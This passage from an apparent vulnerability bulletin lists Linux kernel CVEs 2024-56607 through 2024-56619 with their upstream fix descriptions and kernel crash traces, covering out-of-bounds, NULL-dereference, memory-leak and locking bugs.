do_fault_around+0x2c6/0x4e0 ? do_user_addr_fault+0x8c1/0xde0 ? reacquire_held_locks+0x220/0x4d0 ? do_user_addr_fault+0x8c1/0xde0 ? __kasan_check_read+0x11/0x20 ? __fdget+0x4e/0x1d0 ? sockfd_lookup_light+0x1a/0x170 __sys_sendmsg+0xd2/0x180 ? __sys_sendmsg_sock+0x20/0x20 ? reacquire_held_locks+0x4d0/0x4d0 ? debug_smp_processor_id+0x17/0x20 __x64_sys_sendmsg+0x72/0xb0 ? lockdep_hardirqs_on+0x7d/0x100 x64_sys_call+0x894/0x9f0 do_syscall_64+0x64/0x130 entry_SYSCALL_64_after_ ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56607 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix out-of-bounds access in 'dcn21_link_encoder_create' An issue was identified in the dcn21_link_encoder_create function where an out-of-bounds access could occur when the hpd_source index was used to reference the link_enc_hpd_regs array. This array has a fixed size and the index was not being checked against the array's bounds before accessing it. This fix adds a conditional check to ensure that the hpd_source index is within the valid range of the link_enc_hpd_regs array. If the index is out of bounds, the function now returns NULL to prevent undefined behavior. References: [ 65.920507] ------------[ cut here ]------------ [ 65.920510] UBSAN: array-index-out-of-bounds in drivers/gpu/drm/amd/amdgpu/../display/dc/resource/dcn21/dcn21_resource.c:1312:29 [ 65.920519] index 7 is out of range for type 'dcn10_link_enc_hpd_registers [5]' [ 65.920523] CPU: 3 PID: 1178 Comm: modprobe Tainted: G OE 6.8.0-cleanershaderfeatureresetasdntipmi200nv2132 #13 [ 65.920525] Hardware name: AMD Majolica-RN/Majolica-RN, BIOS WMJ0429N_Weekly_20_04_2 04/29/2020 [ 65.920527] Call Trace: [ 65.920529] <TASK> [ 65.920532] dump_stack_lvl+0x48/0x70 [ 65.920541] dump_stack+0x10/0x20 [ 65.920543] __ubsan_handle_out_of_bounds+0xa2/0xe0 [ 65.920549] dcn21_link_encoder_create+0xd9/0x140 [amdgpu] [ 65.921009] link_create+0x6d3/0xed0 [amdgpu] [ 65.921355] create_links+0x18a/0x4e0 [amdgpu] [ 65.921679] dc_create+0x360/0x720 [amdgpu] [ 65.921999] ? dmi_matches+0xa0/0x220 [ 65.922004] amdgpu_dm_init+0x2b6/0x2c90 [amdgpu] [ 65.922342] ? console_unlock+0x77/0x120 [ 65.922348] ? dev_printk_emit+0x86/0xb0 [ 65.922354] dm_hw_init+0x15/0x40 [amdgpu] [ 65.922686] amdgpu_device_init+0x26a8/0x33a0 [amdgpu] [ 65.922921] amdgpu_driver_load_kms+0x1b/0xa0 [amdgpu] [ 65.923087] amdgpu_pci_probe+0x1b7/0x630 [amdgpu] [ 65.923087] local_pci_probe+0x4b/0xb0 [ 65.923087] pci_device_probe+0xc8/0x280 [ 65.923087] really_probe+0x187/0x300 [ 65.923087] __driver_probe_device+0x85/0x130 [ 65.923087] driver_probe_device+0x24/0x110 [ 65.923087] __driver_attach+0xac/0x1d0 [ 65.923087] ? __pfx___driver_attach+0x10/0x10 [ 65.923087] bus_for_each_dev+0x7d/0xd0 [ 65.923087] driver_attach+0x1e/0x30 [ 65.923087] bus_add_driver+0xf2/0x200 [ 65.923087] driver_register+0x64/0x130 [ 65.923087] ? __pfx_amdgpu_init+0x10/0x10 [amdgpu] [ 65.923087] __pci_register_driver+0x61/0x70 [ 65.923087] amdgpu_init+0x7d/0xff0 [amdgpu] [ 65.923087] do_one_initcall+0x49/0x310 [ 65.923087] ? kmalloc_trace+0x136/0x360 [ 65.923087] do_init_module+0x6a/0x270 [ 65.923087] load_module+0x1fce/0x23a0 [ 65.923087] init_module_from_file+0x9c/0xe0 [ 65.923087] ? init_module_from_file+0x9c/0xe0 [ 65.923087] idempotent_init_module+0x179/0x230 [ 65.923087] __x64_sys_finit_module+0x5d/0xa0 [ 65.923087] do_syscall_64+0x76/0x120 [ 65.923087] entry_SYSCALL_64_after_hwframe+0x6e/0x76 [ 65.923087] RIP: 0033:0x7f2d80f1e88d [ 65.923087] Code: 5b 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 b5 0f 00 f7 d8 64 89 01 48 [ 65.923087] RSP: 002b:00007ffc7bc1aa78 EFLAGS: 00000246 ORIG_RAX: 0000000000000139 [ 65.923087] RAX: ffffffffffffffda RBX: 0000564c9c1db130 RCX: 00007f2d80f1e88d [ 65.923087] RDX: 0000000000000000 RSI: 0000564c9c1e5480 RDI: 000000000000000f [ 65.923087] RBP: 0000000000040000 R08: 0000000000000000 R09: 0000000000000002 [ 65.923087] R10: 000000000000000f R11: 0000000000000246 R12: 0000564c9c1e5480 [ 65.923087] R13: 0000564c9c1db260 R14: 0000000000000000 R15: 0000564c9c1e54b0 [ 65.923087] </TASK> [ 65.923927] ---[ end trace ]--- | 2024-12-27 | not yet calculated | CVE-2024-56608 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: use ieee80211_purge_tx_queue() to purge TX skb When removing kernel modules by: rmmod rtw88_8723cs rtw88_8703b rtw88_8723x rtw88_sdio rtw88_core Driver uses skb_queue_purge() to purge TX skb, but not report tx status causing "Have pending ack frames!" warning. Use ieee80211_purge_tx_queue() to correct this. Since ieee80211_purge_tx_queue() doesn't take locks, to prevent racing between TX work and purge TX queue, flush and destroy TX work in advance. wlan0: deauthenticating from aa:f5:fd:60:4c:a8 by local choice (Reason: 3=DEAUTH_LEAVING) ------------[ cut here ]------------ Have pending ack frames! WARNING: CPU: 3 PID: 9232 at net/mac80211/main.c:1691 ieee80211_free_ack_frame+0x5c/0x90 [mac80211] CPU: 3 PID: 9232 Comm: rmmod Tainted: G C 6.10.1-200.fc40.aarch64 #1 Hardware name: pine64 Pine64 PinePhone Braveheart (1.1)/Pine64 PinePhone Braveheart (1.1), BIOS 2024.01 01/01/2024 pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : ieee80211_free_ack_frame+0x5c/0x90 [mac80211] lr : ieee80211_free_ack_frame+0x5c/0x90 [mac80211] sp : ffff80008c1b37b0 x29: ffff80008c1b37b0 x28: ffff000003be8000 x27: 0000000000000000 x26: 0000000000000000 x25: ffff000003dc14b8 x24: ffff80008c1b37d0 x23: ffff000000ff9f80 x22: 0000000000000000 x21: 000000007fffffff x20: ffff80007c7e93d8 x19: ffff00006e66f400 x18: 0000000000000000 x17: ffff7ffffd2b3000 x16: ffff800083fc0000 x15: 0000000000000000 x14: 0000000000000000 x13: 2173656d61726620 x12: 6b636120676e6964 x11: 0000000000000000 x10: 000000000000005d x9 : ffff8000802af2b0 x8 : ffff80008c1b3430 x7 : 0000000000000001 x6 : 0000000000000001 x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff000003be8000 Call trace: ieee80211_free_ack_frame+0x5c/0x90 [mac80211] idr_for_each+0x74/0x110 ieee80211_free_hw+0x44/0xe8 [mac80211] rtw_sdio_remove+0x9c/0xc0 [rtw88_sdio] sdio_bus_remove+0x44/0x180 device_remove+0x54/0x90 device_release_driver_internal+0x1d4/0x238 driver_detach+0x54/0xc0 bus_remove_driver+0x78/0x108 driver_unregister+0x38/0x78 sdio_unregister_driver+0x2c/0x40 rtw_8723cs_driver_exit+0x18/0x1000 [rtw88_8723cs] __do_sys_delete_module.isra.0+0x190/0x338 __arm64_sys_delete_module+0x1c/0x30 invoke_syscall+0x74/0x100 el0_svc_common.constprop.0+0x48/0xf0 do_el0_svc+0x24/0x38 el0_svc+0x3c/0x158 el0t_64_sync_handler+0x120/0x138 el0t_64_sync+0x194/0x198 ---[ end trace 0000000000000000 ]--- | 2024-12-27 | not yet calculated | CVE-2024-56609 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: kcsan: Turn report_filterlist_lock into a raw_spinlock Ran Xiaokai reports that with a KCSAN-enabled PREEMPT_RT kernel, we can see splats like: | BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48 | in_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 0, name: swapper/1 | preempt_count: 10002, expected: 0 | RCU nest depth: 0, expected: 0 | no locks held by swapper/1/0. | irq event stamp: 156674 | hardirqs last enabled at (156673): [<ffffffff81130bd9>] do_idle+0x1f9/0x240 | hardirqs last disabled at (156674): [<ffffffff82254f84>] sysvec_apic_timer_interrupt+0x14/0xc0 | softirqs last enabled at (0): [<ffffffff81099f47>] copy_process+0xfc7/0x4b60 | softirqs last disabled at (0): [<0000000000000000>] 0x0 | Preemption disabled at: | [<ffffffff814a3e2a>] paint_ptr+0x2a/0x90 | CPU: 1 UID: 0 PID: 0 Comm: swapper/1 Not tainted 6.11.0+ #3 | Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-0-ga698c8995f-prebuilt.qemu.org 04/01/2014 | Call Trace: | <IRQ> | dump_stack_lvl+0x7e/0xc0 | dump_stack+0x1d/0x30 | __might_resched+0x1a2/0x270 | rt_spin_lock+0x68/0x170 | kcsan_skip_report_debugfs+0x43/0xe0 | print_report+0xb5/0x590 | kcsan_report_known_origin+0x1b1/0x1d0 | kcsan_setup_watchpoint+0x348/0x650 | __tsan_unaligned_write1+0x16d/0x1d0 | hrtimer_interrupt+0x3d6/0x430 | __sysvec_apic_timer_interrupt+0xe8/0x3a0 | sysvec_apic_timer_interrupt+0x97/0xc0 | </IRQ> On a detected data race, KCSAN's reporting logic checks if it should filter the report. That list is protected by the report_filterlist_lock *non-raw* spinlock which may sleep on RT kernels. Since KCSAN may report data races in any context, convert it to a raw_spinlock. This requires being careful about when to allocate memory for the filter list itself which can be done via KCSAN's debugfs interface. Concurrent modification of the filter list via debugfs should be rare: the chosen strategy is to optimistically pre-allocate memory before the critical section and discard if unused. | 2024-12-27 | not yet calculated | CVE-2024-56610 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mm/mempolicy: fix migrate_to_node() assuming there is at least one VMA in a MM We currently assume that there is at least one VMA in a MM, which isn't true. So we might end up having find_vma() return NULL, to then de-reference NULL. So properly handle find_vma() returning NULL. This fixes the report: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 1 UID: 0 PID: 6021 Comm: syz-executor284 Not tainted 6.12.0-rc7-syzkaller-00187-gf868cd251776 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/30/2024 RIP: 0010:migrate_to_node mm/mempolicy.c:1090 [inline] RIP: 0010:do_migrate_pages+0x403/0x6f0 mm/mempolicy.c:1194 Code: ... RSP: 0018:ffffc9000375fd08 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffffc9000375fd78 RCX: 0000000000000000 RDX: ffff88807e171300 RSI: dffffc0000000000 RDI: ffff88803390c044 RBP: ffff88807e171428 R08: 0000000000000014 R09: fffffbfff2039ef1 R10: ffffffff901cf78f R11: 0000000000000000 R12: 0000000000000003 R13: ffffc9000375fe90 R14: ffffc9000375fe98 R15: ffffc9000375fdf8 FS: 00005555919e1380(0000) GS:ffff8880b8700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005555919e1ca8 CR3: 000000007f12a000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> kernel_migrate_pages+0x5b2/0x750 mm/mempolicy.c:1709 __do_sys_migrate_pages mm/mempolicy.c:1727 [inline] __se_sys_migrate_pages mm/mempolicy.c:1723 [inline] __x64_sys_migrate_pages+0x96/0x100 mm/mempolicy.c:1723 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f [akpm@linux-foundation.org: add unlikely()] | 2024-12-27 | not yet calculated | CVE-2024-56611 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mm/gup: handle NULL pages in unpin_user_pages() The recent addition of "pofs" (pages or folios) handling to gup has a flaw: it assumes that unpin_user_pages() handles NULL pages in the pages** array. That's not the case, as I discovered when I ran on a new configuration on my test machine. Fix this by skipping NULL pages in unpin_user_pages(), just like unpin_folios() already does. Details: when booting on x86 with "numa=fake=2 movablecore=4G" on Linux 6.12, and running this: tools/testing/selftests/mm/gup_longterm ...I get the following crash: BUG: kernel NULL pointer dereference, address: 0000000000000008 RIP: 0010:sanity_check_pinned_pages+0x3a/0x2d0 ... Call Trace: <TASK> ? __die_body+0x66/0xb0 ? page_fault_oops+0x30c/0x3b0 ? do_user_addr_fault+0x6c3/0x720 ? irqentry_enter+0x34/0x60 ? exc_page_fault+0x68/0x100 ? asm_exc_page_fault+0x22/0x30 ? sanity_check_pinned_pages+0x3a/0x2d0 unpin_user_pages+0x24/0xe0 check_and_migrate_movable_pages_or_folios+0x455/0x4b0 __gup_longterm_locked+0x3bf/0x820 ? mmap_read_lock_killable+0x12/0x50 ? __pfx_mmap_read_lock_killable+0x10/0x10 pin_user_pages+0x66/0xa0 gup_test_ioctl+0x358/0xb20 __se_sys_ioctl+0x6b/0xc0 do_syscall_64+0x7b/0x150 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2024-12-27 | not yet calculated | CVE-2024-56612 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: sched/numa: fix memory leak due to the overwritten vma->numab_state [Problem Description] When running the hackbench program of LTP, the following memory leak is reported by kmemleak. # /opt/ltp/testcases/bin/hackbench 20 thread 1000 Running with 20*40 (== 800) tasks. # dmesg | grep kmemleak ... kmemleak: 480 new suspected memory leaks (see /sys/kernel/debug/kmemleak) kmemleak: 665 new suspected memory leaks (see /sys/kernel/debug/kmemleak) # cat /sys/kernel/debug/kmemleak unreferenced object 0xffff888cd8ca2c40 (size 64): comm "hackbench", pid 17142, jiffies 4299780315 hex dump (first 32 bytes): ac 74 49 00 01 00 00 00 4c 84 49 00 01 00 00 00 .tI.....L.I..... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace (crc bff18fd4): [<ffffffff81419a89>] __kmalloc_cache_noprof+0x2f9/0x3f0 [<ffffffff8113f715>] task_numa_work+0x725/0xa00 [<ffffffff8110f878>] task_work_run+0x58/0x90 [<ffffffff81ddd9f8>] syscall_exit_to_user_mode+0x1c8/0x1e0 [<ffffffff81dd78d5>] do_syscall_64+0x85/0x150 [<ffffffff81e0012b>] entry_SYSCALL_64_after_hwframe+0x76/0x7e ... This issue can be consistently reproduced on three different servers: * a 448-core server * a 256-core server * a 192-core server [Root Cause] Since multiple threads are created by the hackbench program (along with the command argument 'thread'), a shared vma might be accessed by two or more cores simultaneously. When two or more cores observe that vma->numab_state is NULL at the same time, vma->numab_state will be overwritten. Although current code ensures that only one thread scans the VMAs in a single 'numa_scan_period', there might be a chance for another thread to enter in the next 'numa_scan_period' while we have not gotten till numab_state allocation [1]. Note that the command `/opt/ltp/testcases/bin/hackbench 50 process 1000` cannot the reproduce the issue. It is verified with 200+ test runs. [Solution] Use the cmpxchg atomic operation to ensure that only one thread executes the vma->numab_state assignment. [1] https://lore.kernel.org/lkml/1794be3c-358c-4cdc-a43d-a1f841d91ef7@amd.com/ | 2024-12-27 | not yet calculated | CVE-2024-56613 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: xsk: fix OOB map writes when deleting elements Jordy says: " In the xsk_map_delete_elem function an unsigned integer (map->max_entries) is compared with a user-controlled signed integer (k). Due to implicit type conversion, a large unsigned value for map->max_entries can bypass the intended bounds check: if (k >= map->max_entries) return -EINVAL; This allows k to hold a negative value (between -2147483648 and -2), which is then used as an array index in m->xsk_map[k], which results in an out-of-bounds access. spin_lock_bh(&m->lock); map_entry = &m->xsk_map[k]; // Out-of-bounds map_entry old_xs = unrcu_pointer(xchg(map_entry, NULL)); // Oob write if (old_xs) xsk_map_sock_delete(old_xs, map_entry); spin_unlock_bh(&m->lock); The xchg operation can then be used to cause an out-of-bounds write. Moreover, the invalid map_entry passed to xsk_map_sock_delete can lead to further memory corruption. " It indeed results in following splat: [76612.897343] BUG: unable to handle page fault for address: ffffc8fc2e461108 [76612.904330] #PF: supervisor write access in kernel mode [76612.909639] #PF: error_code(0x0002) - not-present page [76612.914855] PGD 0 P4D 0 [76612.917431] Oops: Oops: 0002 [#1] PREEMPT SMP [76612.921859] CPU: 11 UID: 0 PID: 10318 Comm: a.out Not tainted 6.12.0-rc1+ #470 [76612.929189] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.02.01.0008.031920191559 03/19/2019 [76612.939781] RIP: 0010:xsk_map_delete_elem+0x2d/0x60 [76612.944738] Code: 00 00 41 54 55 53 48 63 2e 3b 6f 24 73 38 4c 8d a7 f8 00 00 00 48 89 fb 4c 89 e7 e8 2d bf 05 00 48 8d b4 eb 00 01 00 00 31 ff <48> 87 3e 48 85 ff 74 05 e8 16 ff ff ff 4c 89 e7 e8 3e bc 05 00 31 [76612.963774] RSP: 0018:ffffc9002e407df8 EFLAGS: 00010246 [76612.969079] RAX: 0000000000000000 RBX: ffffc9002e461000 RCX: 0000000000000000 [76612.976323] RDX: 0000000000000001 RSI: ffffc8fc2e461108 RDI: 0000000000000000 [76612.983569] RBP: ffffffff80000001 R08: 0000000000000000 R09: 0000000000000007 [76612.990812] R10: ffffc9002e407e18 R11: ffff888108a38858 R12: ffffc9002e4610f8 [76612.998060] R13: ffff888108a38858 R14: 00007ffd1ae0ac78 R15: ffffc9002e4610c0 [76613.005303] FS: 00007f80b6f59740(0000) GS:ffff8897e0ec0000(0000) knlGS:0000000000000000 [76613.013517] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [76613.019349] CR2: ffffc8fc2e461108 CR3: 000000011e3ef001 CR4: 00000000007726f0 [76613.026595] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [76613.033841] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [76613.041086] PKRU: 55555554 [76613.043842] Call Trace: [76613.046331] <TASK> [76613.048468] ? __die+0x20/0x60 [76613.051581] ? page_fault_oops+0x15a/0x450 [76613.055747] ? search_extable+0x22/0x30 [76613.059649] ? search_bpf_extables+0x5f/0x80 [76613.063988] ? exc_page_fault+0xa9/0x140 [76613.067975] ? asm_exc_page_fault+0x22/0x30 [76613.072229] ? xsk_map_delete_elem+0x2d/0x60 [76613.076573] ? xsk_map_delete_elem+0x23/0x60 [76613.080914] __sys_bpf+0x19b7/0x23c0 [76613.084555] __x64_sys_bpf+0x1a/0x20 [76613.088194] do_syscall_64+0x37/0xb0 [76613.091832] entry_SYSCALL_64_after_hwframe+0x4b/0x53 [76613.096962] RIP: 0033:0x7f80b6d1e88d [76613.100592] Code: 5b 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 b5 0f 00 f7 d8 64 89 01 48 [76613.119631] RSP: 002b:00007ffd1ae0ac68 EFLAGS: 00000206 ORIG_RAX: 0000000000000141 [76613.131330] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f80b6d1e88d [76613.142632] RDX: 0000000000000098 RSI: 00007ffd1ae0ad20 RDI: 0000000000000003 [76613.153967] RBP: 00007ffd1ae0adc0 R08: 0000000000000000 R09: 0000000000000000 [76613.166030] R10: 00007f80b6f77040 R11: 0000000000000206 R12: 00007ffd1ae0aed8 [76613.177130] R13: 000055ddf42ce1e9 R14: 000055ddf42d0d98 R15: 00 ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56614 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf: fix OOB devmap writes when deleting elements Jordy reported issue against XSKMAP which also applies to DEVMAP - the index used for accessing map entry, due to being a signed integer, causes the OOB writes. Fix is simple as changing the type from int to u32, however, when compared to XSKMAP case, one more thing needs to be addressed. When map is released from system via dev_map_free(), we iterate through all of the entries and an iterator variable is also an int, which implies OOB accesses. Again, change it to be u32. Example splat below: [ 160.724676] BUG: unable to handle page fault for address: ffffc8fc2c001000 [ 160.731662] #PF: supervisor read access in kernel mode [ 160.736876] #PF: error_code(0x0000) - not-present page [ 160.742095] PGD 0 P4D 0 [ 160.744678] Oops: Oops: 0000 [#1] PREEMPT SMP [ 160.749106] CPU: 1 UID: 0 PID: 520 Comm: kworker/u145:12 Not tainted 6.12.0-rc1+ #487 [ 160.757050] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.02.01.0008.031920191559 03/19/2019 [ 160.767642] Workqueue: events_unbound bpf_map_free_deferred [ 160.773308] RIP: 0010:dev_map_free+0x77/0x170 [ 160.777735] Code: 00 e8 fd 91 ed ff e8 b8 73 ed ff 41 83 7d 18 19 74 6e 41 8b 45 24 49 8b bd f8 00 00 00 31 db 85 c0 74 48 48 63 c3 48 8d 04 c7 <48> 8b 28 48 85 ed 74 30 48 8b 7d 18 48 85 ff 74 05 e8 b3 52 fa ff [ 160.796777] RSP: 0018:ffffc9000ee1fe38 EFLAGS: 00010202 [ 160.802086] RAX: ffffc8fc2c001000 RBX: 0000000080000000 RCX: 0000000000000024 [ 160.809331] RDX: 0000000000000000 RSI: 0000000000000024 RDI: ffffc9002c001000 [ 160.816576] RBP: 0000000000000000 R08: 0000000000000023 R09: 0000000000000001 [ 160.823823] R10: 0000000000000001 R11: 00000000000ee6b2 R12: dead000000000122 [ 160.831066] R13: ffff88810c928e00 R14: ffff8881002df405 R15: 0000000000000000 [ 160.838310] FS: 0000000000000000(0000) GS:ffff8897e0c40000(0000) knlGS:0000000000000000 [ 160.846528] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 160.852357] CR2: ffffc8fc2c001000 CR3: 0000000005c32006 CR4: 00000000007726f0 [ 160.859604] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 160.866847] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 160.874092] PKRU: 55555554 [ 160.876847] Call Trace: [ 160.879338] <TASK> [ 160.881477] ? __die+0x20/0x60 [ 160.884586] ? page_fault_oops+0x15a/0x450 [ 160.888746] ? search_extable+0x22/0x30 [ 160.892647] ? search_bpf_extables+0x5f/0x80 [ 160.896988] ? exc_page_fault+0xa9/0x140 [ 160.900973] ? asm_exc_page_fault+0x22/0x30 [ 160.905232] ? dev_map_free+0x77/0x170 [ 160.909043] ? dev_map_free+0x58/0x170 [ 160.912857] bpf_map_free_deferred+0x51/0x90 [ 160.917196] process_one_work+0x142/0x370 [ 160.921272] worker_thread+0x29e/0x3b0 [ 160.925082] ? rescuer_thread+0x4b0/0x4b0 [ 160.929157] kthread+0xd4/0x110 [ 160.932355] ? kthread_park+0x80/0x80 [ 160.936079] ret_from_fork+0x2d/0x50 [ 160.943396] ? kthread_park+0x80/0x80 [ 160.950803] ret_from_fork_asm+0x11/0x20 [ 160.958482] </TASK> | 2024-12-27 | not yet calculated | CVE-2024-56615 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/dp_mst: Fix MST sideband message body length check Fix the MST sideband message body length check, which must be at least 1 byte accounting for the message body CRC (aka message data CRC) at the end of the message. This fixes a case where an MST branch device returns a header with a correct header CRC (indicating a correctly received body length), with the body length being incorrectly set to 0. This will later lead to a memory corruption in drm_dp_sideband_append_payload() and the following errors in dmesg: UBSAN: array-index-out-of-bounds in drivers/gpu/drm/display/drm_dp_mst_topology.c:786:25 index -1 is out of range for type 'u8 [48]' Call Trace: drm_dp_sideband_append_payload+0x33d/0x350 [drm_display_helper] drm_dp_get_one_sb_msg+0x3ce/0x5f0 [drm_display_helper] drm_dp_mst_hpd_irq_handle_event+0xc8/0x1580 [drm_display_helper] memcpy: detected field-spanning write (size 18446744073709551615) of single field "&msg->msg[msg->curlen]" at drivers/gpu/drm/display/drm_dp_mst_topology.c:791 (size 256) Call Trace: drm_dp_sideband_append_payload+0x324/0x350 [drm_display_helper] drm_dp_get_one_sb_msg+0x3ce/0x5f0 [drm_display_helper] drm_dp_mst_hpd_irq_handle_event+0xc8/0x1580 [drm_display_helper] | 2024-12-27 | not yet calculated | CVE-2024-56616 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: cacheinfo: Allocate memory during CPU hotplug if not done from the primary CPU Commit 5944ce092b97 ("arch_topology: Build cacheinfo from primary CPU") adds functionality that architectures can use to optionally allocate and build cacheinfo early during boot. Commit 6539cffa9495 ("cacheinfo: Add arch specific early level initializer") lets secondary CPUs correct (and reallocate memory) cacheinfo data if needed. If the early build functionality is not used and cacheinfo does not need correction, memory for cacheinfo is never allocated. x86 does not use the early build functionality. Consequently, during the cacheinfo CPU hotplug callback, last_level_cache_is_valid() attempts to dereference a NULL pointer: BUG: kernel NULL pointer dereference, address: 0000000000000100 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not present page PGD 0 P4D 0 Oops: 0000 [#1] PREEPMT SMP NOPTI CPU: 0 PID 19 Comm: cpuhp/0 Not tainted 6.4.0-rc2 #1 RIP: 0010: last_level_cache_is_valid+0x95/0xe0a Allocate memory for cacheinfo during the cacheinfo CPU hotplug callback if not done earlier. Moreover, before determining the validity of the last-level cache info, ensure that it has been allocated. Simply checking for non-zero cache_leaves() is not sufficient, as some architectures (e.g., Intel processors) have non-zero cache_leaves() before allocation. Dereferencing NULL cacheinfo can occur in update_per_cpu_data_slice_size(). This function iterates over all online CPUs. However, a CPU may have come online recently, but its cacheinfo may not have been allocated yet. While here, remove an unnecessary indentation in allocate_cache_info(). [ bp: Massage. ] | 2024-12-27 | not yet calculated | CVE-2024-56617 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: pmdomain: imx: gpcv2: Adjust delay after power up handshake The udelay(5) is not enough, sometimes below kernel panic still be triggered: [ 4.012973] Kernel panic - not syncing: Asynchronous SError Interrupt [ 4.012976] CPU: 2 UID: 0 PID: 186 Comm: (udev-worker) Not tainted 6.12.0-rc2-0.0.0-devel-00004-g8b1b79e88956 #1 [ 4.012982] Hardware name: Toradex Verdin iMX8M Plus WB on Dahlia Board (DT) [ 4.012985] Call trace: [...] [ 4.013029] arm64_serror_panic+0x64/0x70 [ 4.013034] do_serror+0x3c/0x70 [ 4.013039] el1h_64_error_handler+0x30/0x54 [ 4.013046] el1h_64_error+0x64/0x68 [ 4.013050] clk_imx8mp_audiomix_runtime_resume+0x38/0x48 [ 4.013059] __genpd_runtime_resume+0x30/0x80 [ 4.013066] genpd_runtime_resume+0x114/0x29c [ 4.013073] __rpm_callback+0x48/0x1e0 [ 4.013079] rpm_callback+0x68/0x80 [ 4.013084] rpm_resume+0x3bc/0x6a0 [ 4.013089] __pm_runtime_resume+0x50/0x9c [ 4.013095] pm_runtime_get_suppliers+0x60/0x8c [ 4.013101] __driver_probe_device+0x4c/0x14c [ 4.013108] driver_probe_device+0x3c/0x120 [ 4.013114] __driver_attach+0xc4/0x200 [ 4.013119] bus_for_each_dev+0x7c/0xe0 [ 4.013125] driver_attach+0x24/0x30 [ 4.013130] bus_add_driver+0x110/0x240 [ 4.013135] driver_register+0x68/0x124 [ 4.013142] __platform_driver_register+0x24/0x30 [ 4.013149] sdma_driver_init+0x20/0x1000 [imx_sdma] [ 4.013163] do_one_initcall+0x60/0x1e0 [ 4.013168] do_init_module+0x5c/0x21c [ 4.013175] load_module+0x1a98/0x205c [ 4.013181] init_module_from_file+0x88/0xd4 [ 4.013187] __arm64_sys_finit_module+0x258/0x350 [ 4.013194] invoke_syscall.constprop.0+0x50/0xe0 [ 4.013202] do_el0_svc+0xa8/0xe0 [ 4.013208] el0_svc+0x3c/0x140 [ 4.013215] el0t_64_sync_handler+0x120/0x12c [ 4.013222] el0t_64_sync+0x190/0x194 [ 4.013228] SMP: stopping secondary CPUs The correct way is to wait handshake, but it needs BUS clock of BLK-CTL be enabled, which is in separate driver. So delay is the only option here. The udelay(10) is a data got by experiment. | 2024-12-27 | not yet calculated | CVE-2024-56618 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix potential out-of-bounds memory access in nilfs_find_entry() Syzbot reported that when searching for records in a directory where the inode's i_size is corrupted and has a large value, memory access outside the folio/page range may occur, or a use-after-free bug may be detected if KASAN is enabled. This is because nilfs_last_byte(), which is called by nilfs_find_entry() and others to calculate the number of valid bytes of directory data in a page from i_size and the page index, loses the upper 32 bits of the 64-bit size information due to an inappropriate type of local variable to which the i_size value is assigned. This caused a large byte offset value due to underflow in the end address calculation in the calling nilfs_find_entry(), resulting in memory access that exceeds the folio/page size. Fix this issue by changing the type of the local variable causing the bit loss from "unsigned int" to "u64". The return value of nilfs_last_byte() is also of type "unsigned int", but it is truncated so as not to exceed PAGE_SIZE and no bit loss occurs, so no change is required. | 2024-12-27 | not yet calculated | CVE-2024-56619 |
| n/a -- n/a |
